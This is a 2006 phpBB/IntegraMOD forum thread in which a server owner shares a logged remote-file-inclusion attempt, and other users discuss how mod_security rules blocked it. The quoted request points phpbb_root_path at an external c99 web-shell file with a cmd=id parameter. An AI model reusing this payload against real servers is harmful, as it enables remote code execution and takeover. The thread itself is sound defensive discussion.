Hacking Attempt?

This is where youll find security related information.
Discuss Integramod/phpbb security issues here.

Moderator: Integra Moderator

post
reply

Hacking Attempt?

PostAuthor: Bush » Tue Sep 12, 2006 6:53 pm

I seen this in my logs of my Dedicated Linux server for my site.

GET /portal///includes/functions_portal.php?phpbb_root_path=http://www.festivalrilke.ch/files/upload/c99shellb16.txt?&cmd=id HTTP/1.1

If you click the URL within the GET command you'll see an elaborate script that is trying to be executed. Thank god I have mod_security installed and it was able to block/deny the phpbb_root_path command from being executed.
Last edited by Bush on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
no signature.

Bush
Integra Member
Integra Member
 
Posts: 191
Likes: 0 post
Liked in: 0 post
Joined: Tue Mar 28, 2006 7:55 am
Cash on hand: 0.00
Top

PostAuthor: Michaelo » Wed Sep 13, 2006 12:15 pm

It denies the GET command and not the php_root_path...
The current security updates prevent this...
Last edited by Michaelo on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
Kiss Portal Engine phpbbireland (status: Released)
User avatar
Michaelo
Administrator
Administrator
 
Posts: 1646
Likes: 0 post
Liked in: 0 post
Joined: Sat Mar 11, 2006 5:14 pm
Cash on hand: 0.00
Location: Dublin, Ireland
Top

PostAuthor: computerz » Wed Sep 13, 2006 3:36 pm

"Michaelo";p="15390" wrote:It denies the GET command and not the php_root_path...
The current security updates prevent this...


It will deny the phpbb_root_path element if it is specified in the filters. I made a post on this below. I also have similar exploit attempts in my logs and they're not using a GET statement, but they're still getting blocked because of the phpbb_root_path parameter is being filtered in my rule set.
Last edited by computerz on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.

computerz
Members
Members
 
Posts: 84
Likes: 0 post
Liked in: 0 post
Joined: Sun Aug 27, 2006 1:21 pm
Cash on hand: 0.00
Top

PostAuthor: Michaelo » Thu Sep 14, 2006 3:33 am

Must be updates since the breach... <img>
Last edited by Michaelo on Wed Dec 31, 1969 4:00 pm, edited 1 time in total.
Kiss Portal Engine phpbbireland (status: Released)
User avatar
Michaelo
Administrator
Administrator
 
Posts: 1646
Likes: 0 post
Liked in: 0 post
Joined: Sat Mar 11, 2006 5:14 pm
Cash on hand: 0.00
Location: Dublin, Ireland
Top
post
reply
Return to Forum Security

Who is online

Registered users: Bing [Bot], Google [Bot], Helter, Majestic-12 [Bot]

IntegraMOD® is Powered by phpBB® Forum Software © phpBB Group
Support Ukraine
support Ukraine